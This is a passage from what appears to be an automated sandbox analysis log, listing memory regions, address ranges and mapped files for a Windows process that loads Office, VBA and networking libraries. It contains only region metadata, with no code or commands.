"c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db") Region: id = 516 start_va = 0x2410000 end_va = 0x2413fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 517 start_va = 0xcb00000 end_va = 0xcb8dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 518 start_va = 0xcb90000 end_va = 0xcb9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cb90000" filename = "" Region: id = 519 start_va = 0x2420000 end_va = 0x2430fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\propsys.dll.mui") Region: id = 520 start_va = 0x80d0000 end_va = 0x80d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000080d0000" filename = "" Region: id = 521 start_va = 0x80e0000 end_va = 0x80e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000080e0000" filename = "" Region: id = 522 start_va = 0x8260000 end_va = 0x8260fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008260000" filename = "" Region: id = 523 start_va = 0xce40000 end_va = 0xcf26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "calibri.ttf" filename = "\\Windows\\Fonts\\calibri.ttf" (normalized: "c:\\windows\\fonts\\calibri.ttf") Region: id = 524 start_va = 0x68550000 end_va = 0x6866bfff monitored = 0 entry_point = 0x685b74f0 region_type = mapped_file name = "uiautomationcore.dll" filename = "\\Windows\\SysWOW64\\UIAutomationCore.dll" (normalized: "c:\\windows\\syswow64\\uiautomationcore.dll") Region: id = 525 start_va = 0x69580000 end_va = 0x69598fff monitored = 0 entry_point = 0x695847e0 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 526 start_va = 0x8260000 end_va = 0x8260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008260000" filename = "" Region: id = 527 start_va = 0x8270000 end_va = 0x827ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008270000" filename = "" Region: id = 528 start_va = 0x7fe90000 end_va = 0x7fe9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe90000" filename = "" Region: id = 529 start_va = 0xf760000 end_va = 0xfb1cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f760000" filename = "" Region: id = 530 start_va = 0xfb20000 end_va = 0xfedcfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000fb20000" filename = "" Region: id = 531 start_va = 0xcf30000 end_va = 0xd02ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cf30000" filename = "" Region: id = 532 start_va = 0x8270000 end_va = 0x827ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008270000" filename = "" Region: id = 533 start_va = 0xcba0000 end_va = 0xcbaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cba0000" filename = "" Region: id = 534 start_va = 0xcbb0000 end_va = 0xcbbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cbb0000" filename = "" Region: id = 535 start_va = 0xcbb0000 end_va = 0xcbbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cbb0000" filename = "" Region: id = 536 start_va = 0xd030000 end_va = 0xd0cbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d030000" filename = "" Region: id = 537 start_va = 0xcbb0000 end_va = 0xcbbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cbb0000" filename = "" Region: id = 538 start_va = 0xcbc0000 end_va = 0xcbcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cbc0000" filename = "" Region: id = 539 start_va = 0xcbd0000 end_va = 0xcbdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cbd0000" filename = "" Region: id = 540 start_va = 0xcbd0000 end_va = 0xcbdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cbd0000" filename = "" Region: id = 541 start_va = 0xcbe0000 end_va = 0xcbeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cbe0000" filename = "" Region: id = 542 start_va = 0xcbf0000 end_va = 0xcbfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cbf0000" filename = "" Region: id = 543 start_va = 0x76b50000 end_va = 0x76b54fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\SysWOW64\\normaliz.dll" (normalized: "c:\\windows\\syswow64\\normaliz.dll") Region: id = 544 start_va = 0xcbd0000 end_va = 0xcbe1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normidna.nls" filename = "\\Windows\\System32\\normidna.nls" (normalized: "c:\\windows\\system32\\normidna.nls") Region: id = 545 start_va = 0x69570000 end_va = 0x6957afff monitored = 0 entry_point = 0x69572150 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\SysWOW64\\linkinfo.dll" (normalized: "c:\\windows\\syswow64\\linkinfo.dll") Region: id = 546 start_va = 0xcbf0000 end_va = 0xcbf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cbf0000" filename = "" Region: id = 547 start_va = 0xcbf0000 end_va = 0xcbf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cbf0000" filename = "" Region: id = 548 start_va = 0x68480000 end_va = 0x68548fff monitored = 0 entry_point = 0x68493180 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\SysWOW64\\ntshrui.dll" (normalized: "c:\\windows\\syswow64\\ntshrui.dll") Region: id = 549 start_va = 0x68460000 end_va = 0x6847bfff monitored = 0 entry_point = 0x68464720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 550 start_va = 0x69560000 end_va = 0x6956efff monitored = 0 entry_point = 0x69563f00 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 551 start_va = 0xcc00000 end_va = 0xcc00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cc00000" filename = "" Region: id = 552 start_va = 0xfee0000 end_va = 0xffe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fee0000" filename = "" Region: id = 553 start_va = 0xfee0000 end_va = 0xffe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fee0000" filename = "" Region: id = 554 start_va = 0xfee0000 end_va = 0xffe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fee0000" filename = "" Region: id = 555 start_va = 0xcc00000 end_va = 0xcc00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cc00000" filename = "" Region: id = 556 start_va = 0xfee0000 end_va = 0xffe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fee0000" filename = "" Region: id = 557 start_va = 0xfee0000 end_va = 0xffe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fee0000" filename = "" Region: id = 558 start_va = 0x70890000 end_va = 0x708d0fff monitored = 0 entry_point = 0x70897fe0 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\SysWOW64\\DataExchange.dll" (normalized: "c:\\windows\\syswow64\\dataexchange.dll") Region: id = 559 start_va = 0xcc00000 end_va = 0xcc0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cc00000" filename = "" Region: id = 560 start_va = 0x70ac0000 end_va = 0x70ad2fff monitored = 0 entry_point = 0x70ac9950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 561 start_va = 0x709b0000 end_va = 0x709defff monitored = 0 entry_point = 0x709c95e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 562 start_va = 0xcc00000 end_va = 0xcc0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cc00000" filename = "" Region: id = 563 start_va = 0x694d0000 end_va = 0x69550fff monitored = 0 entry_point = 0x694eb260 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 564 start_va = 0xfee0000 end_va = 0xffc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msword.olb" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\MSWORD.OLB" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\msword.olb") Region: id = 565 start_va = 0xffd0000 end_va = 0x101f5fff monitored = 1 entry_point = 0xffde058 region_type = mapped_file name = "vbeui.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba7.1\\vbeui.dll") Region: id = 566 start_va = 0x69290000 end_va = 0x694c0fff monitored = 1 entry_point = 0x6929e058 region_type = mapped_file name = "vbeui.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba7.1\\vbeui.dll") Region: id = 567 start_va = 0xcc00000 end_va = 0xcc01fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cc00000" filename = "" Region: id = 568 start_va = 0x74c00000 end_va = 0x74c41fff monitored = 0 entry_point = 0x74c16f10 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 569 start_va = 0x764c0000 end_va = 0x764cdfff monitored = 0 entry_point = 0x764c5410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 570 start_va = 0x73f90000 end_va = 0x74107fff monitored = 0 entry_point = 0x73fe8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 571 start_va = 0xcc10000 end_va = 0xcc16fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cc10000" filename = "" Region: id = 572 start_va = 0xcc20000 end_va = 0xcc2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cc20000" filename = "" Region: id = 573 start_va = 0x69280000 end_va = 0x6928cfff monitored = 0 entry_point = 0x69283520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 574 start_va = 0x69210000 end_va = 0x69276fff monitored = 0 entry_point = 0x6922b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 575 start_va = 0x10000000 end_va = 0x10025fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vbe7intl.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba7.1\\1033\\vbe7intl.dll") Region: id = 576 start_va = 0x691f0000 end_va = 0x69200fff monitored = 0 entry_point = 0x691f8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 577 start_va = 0xcc30000 end_va = 0xcc3afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normnfd.nls" filename = "\\Windows\\System32\\normnfd.nls" (normalized: "c:\\windows\\system32\\normnfd.nls") Region: id = 578 start_va = 0xd0d0000 end_va = 0xd10ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d0d0000" filename = "" Region: id = 579 start_va = 0x10030000 end_va = 0x1012ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010030000" filename = "" Region: id = 580 start_va = 0x69130000 end_va = 0x691eefff monitored = 0 entry_point = 0x69161e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 581 start_va = 0xd110000 end_va = 0xd11ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000d110000" filename = "" Region: id = 582 start_va = 0xd110000 end_va = 0xd11ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000d110000" filename = "" Region: id = 583 start_va = 0xd110000 end_va = 0xd110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d110000" filename = "" Region: id = 584 start_va = 0xffd0000 end_va = 0xffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ffd0000" filename = "" Region: id = 585 start_va = 0xdd80000 end_va = 0xdd82fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000dd80000" filename = "" Region: id = 586 start_va = 0xfff0000 end_va = 0xfff3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fff0000" filename = "" Region: id = 587 start_va = 0x10130000 end_va = 0x10130fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010130000" filename = "" Region: id = 588 start_va = 0x10140000 end_va = 0x10140fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010140000" filename = "" Region: id = 589 start_va = 0x10150000 end_va = 0x10153fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010150000" filename = "" Region: id = 590 start_va = 0x10160000 end_va = 0x1017ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010160000" filename = "" Region: id = 591 start_va = 0x10180000 end_va = 0x10182fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010180000" filename = "" Region: id = 592 start_va = 0x10190000 end_va = 0x101a4fff monitored = 1 entry_point = 0x1022bfb8 region_type = mapped_file name = "vbe7.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll") Region: id = 593 start_va = 0x101b0000 end_va = 0x101b4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\SysWOW64\\stdole2.tlb" (normalized: "c:\\windows\\syswow64\\stdole2.tlb") Region: id = 594 start_va = 0x101c0000 end_va = 0x1023bfff monitored = 0 entry_point = 0x101c1000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso.dll") Region: id = 595 start_va = 0x10240000 end_va = 0x10243fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010240000" filename = "" Region: id = 596 start_va = 0x10250000 end_va = 0x10253fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010250000" filename = "" Region: id = 597 start_va = 0x10260000 end_va = 0x10a5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010260000" filename = "" Region: id = 598 start_va = 0x10a60000 end_va = 0x10a63fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010a60000" filename = "" Region: id = 599 start_va = 0x10a60000 end_va = 0x10a9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010a60000" filename = "" Region: id = 600 start_va = 0x10aa0000 end_va = 0x10b9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010aa0000" filename = "" Region: id = 601 start_va = 0x10ba0000 end_va = 0x10ba3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010ba0000" filename = "" Region: id = 602 start_va = 0x10bb0000 end_va = 0x10bb3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010bb0000" filename = "" Region: id = 603 start_va = 0x10bc0000 end_va = 0x10bc3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010bc0000" filename = "" Region: id = 604 start_va = 0x10bd0000 end_va = 0x10bd3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010bd0000" filename = "" Region: id = 605 start_va = 0x10be0000 end_va = 0x10be3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010be0000" filename = "" Region: id = 606 start_va = 0x10bf0000 end_va = 0x10bf3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010bf0000" filename = "" Region: id = 607 start_va = 0x10c00000 end_va = 0x10c03fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010c00000" filename = "" Region: id = 608 start_va = 0x10c10000 end_va = 0x10c13fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010c10000" filename = "" Region: id = 609 start_va = 0x10c20000 end_va = 0x10c23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010c20000" filename = "" Region: id = 610 start_va = 0x10c30000 end_va = 0x10c33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010c30000" filename = "" Region: id = 611 start_va = 0x10c40000 end_va = 0x10c43fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010c40000" filename = "" Region: id = 612 start_va = 0x10c50000 end_va = 0x10c53fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010c50000" filename = "" Region: id = 613 start_va = 0x10c60000 end_va = 0x10c63fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010c60000" filename = "" Region: id = 614 start_va = 0x10c70000 end_va = 0x10c73fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010c70000" filename = "" Region: id = 615 start_va = 0x10c80000 end_va = 0x10c83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010c80000" filename = "" Region: id = 616 start_va = 0x10c90000 end_va = 0x10c93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010c90000" filename = "" Region: id = 617 start_va = 0x10ca0000 end_va = 0x10ca3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010ca0000" filename = "" Region: id = 618 start_va = 0x10cb0000 end_va = 0x10cb3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010cb0000" filename = "" Region: id = 619 start_va = 0x10cc0000 end_va = 0x10cc3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010cc0000" filename = "" Region: id = 620 start_va = 0x10cd0000 end_va = 0x10cd3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010cd0000" filename = "" Region: id = 621 start_va = 0x10ce0000 end_va = 0x10ce3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010ce0000" filename = "" Region: id = 622 start_va = 0x10cf0000 end_va = 0x10cf3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010cf0000" filename = "" Region: id = 623 start_va = 0x10d00000 end_va = 0x10d03fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010d00000" filename = "" Region: id = 624 start_va = 0x10d10000 end_va = 0x10d13fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010d10000" filename = "" Region: id = 625 start_va = 0x10d20000 end_va = 0x10d23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010d20000" filename = "" Region: id = 626 start_va = 0x10d30000 end_va = 0x10d33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010d30000" filename = "" Region: id = 627 start_va = 0x10d40000 end_va = 0x10d43fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010d40000" filename = "" Region: id = 628 start_va = 0x10d50000 end_va = 0x10d53fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010d50000" filename = "" Region: id = 629 start_va = 0x10d60000 end_va = 0x10d63fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010d60000" filename = "" Region: id = 630 start_va = 0x10d70000 end_va = 0x10d73fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010d70000" filename = "" Region: id = 631 start_va = 0x10d80000 end_va = 0x10d83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010d80000" filename = "" Region: id = 632 start_va = 0x10d90000 end_va = 0x10d93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010d90000" filename = "" Region: id = 633 start_va = 0x10da0000 end_va = 0x10da3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010da0000" filename = "" Region: id = 634 start_va = 0x10db0000 end_va = 0x10db3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010db0000" filename = "" Region: id = 635 start_va = 0x10dc0000 end_va = 0x10dc3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010dc0000" filename = "" Region: id = 636 start_va = 0x10dd0000 end_va = 0x10dd3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010dd0000" filename = "" Region: id = 637 start_va = 0x10de0000 end_va = 0x10de3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010de0000" filename = "" Region: id = 638 start_va = 0x10df0000 end_va = 0x10df3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010df0000" filename = "" Region: id = 639 start_va = 0x10e00000 end_va = 0x10e03fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010e00000" filename = "" Region: id = 640 start_va = 0x10e10000 end_va = 0x10e13fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010e10000" filename = "" Region: id = 641 start_va = 0x10e20000 end_va = 0x10e23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010e20000" filename = "" Region: id = 642 start_va = 0x10e30000 end_va = 0x10e33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010e30000" filename = "" Region: id = 643 start_va = 0x10e40000 end_va = 0x10e43fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010e40000" filename = "" Region: id = 644 start_va = 0x10e50000 end_va = 0x10e53fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010e50000" filename = "" Region: id = 645 start_va = 0x10e60000 end_va = 0x10e63fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010e60000" filename = "" Region: id = 646 start_va = 0x10e70000 end_va = 0x10e73fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010e70000" filename = "" Region: id = 647 start_va = 0x10e80000 end_va = 0x10e83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010e80000" filename = "" Region: id = 648 start_va = 0x10e90000 end_va = 0x10e93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010e90000" filename = "" Region: id = 649 start_va = 0x10ea0000 end_va = 0x10ea3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010ea0000" filename = "" Region: id = 650 start_va = 0x10eb0000 end_va = 0x10eb3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010eb0000" filename = "" Region: id = 651 start_va = 0x10ec0000 end_va = 0x10ec3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010ec0000" filename = "" Region: id = 652 start_va = 0x10ed0000 end_va = 0x10ed3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010ed0000" filename = "" Region: id = 653 start_va = 0x10ee0000 end_va = 0x10ee3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010ee0000" filename = "" Region: id = 654 start_va = 0x10ef0000 end_va = 0x10ef3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010ef0000" filename = "" Region: id = 655 start_va = 0x10f00000 end_va = 0x10f03fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010f00000" filename = "" Region: id = 656 start_va = 0x10f10000 end_va = 0x10f13fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010f10000" filename = "" Region: id = 657 start_va = 0x10f20000 end_va = 0x10f23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010f20000" filename = "" Region: id = 658 start_va = 0x10f30000 end_va = 0x10f33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010f30000" filename = "" Region: id = 659 start_va = 0x10f40000 end_va = 0x10f43fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010f40000" filename = "" Region: id = 660 start_va = 0x10f50000 end_va = 0x10f53fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010f50000" filename = "" Region: id = 661 start_va = 0x10f60000 end_va = 0x10f63fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010f60000" filename = "" Region: id = 662 start_va = 0x10f70000 end_va = 0x10f73fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010f70000" filename = "" Region: id = 663 start_va = 0x10f80000 end_va = 0x10f83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010f80000" filename = "" Region: id = 664 start_va = 0x10f90000 end_va = 0x10f93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010f90000" filename = "" Region: id = 665 start_va = 0x10fa0000 end_va = 0x10fa4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010fa0000" filename = "" Region: id = 666 start_va = 0x10fb0000 end_va = 0x114affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010fb0000" filename = "" Region: id = 667 start_va = 0x71570000 end_va = 0x7177cfff monitored = 0 entry_point = 0x7165acb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 668 start_va = 0x114b0000 end_va = 0x114b0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 669 start_va = 0x71520000 end_va = 0x71531fff monitored = 0 entry_point = 0x71524510 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 670 start_va = 0x714f0000 end_va = 0x7151efff monitored = 0 entry_point = 0x714fbb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 671 start_va = 0x71450000 end_va = 0x714eafff monitored = 0 entry_point = 0x7148f7e0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 672 start_va = 0x76900000 end_va = 0x76906fff monitored = 0 entry_point = 0x76901e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 673 start_va = 0x71400000 end_va = 0x7144efff monitored = 0 entry_point = 0x7140d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 674 start_va = 0x713f0000 end_va = 0x713f7fff monitored = 0 entry_point = 0x713f1fc0 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 675 start_va = 0x70a30000 end_va = 0x70ab3fff monitored = 0 entry_point = 0x70a56530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 676 start_va = 0x114c0000 end_va = 0x114cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000114c0000" filename = "" Region: id = 677 start_va = 0x114d0000 end_va = 0x1150ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000114d0000" filename = "" Region: id = 678 start_va = 0x11510000 end_va = 0x1160ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011510000" filename = "" Region: id = 679 start_va = 0x704e0000 end_va = 0x704e7fff monitored = 0 entry_point = 0x704e1920 region_type = mapped_file name = 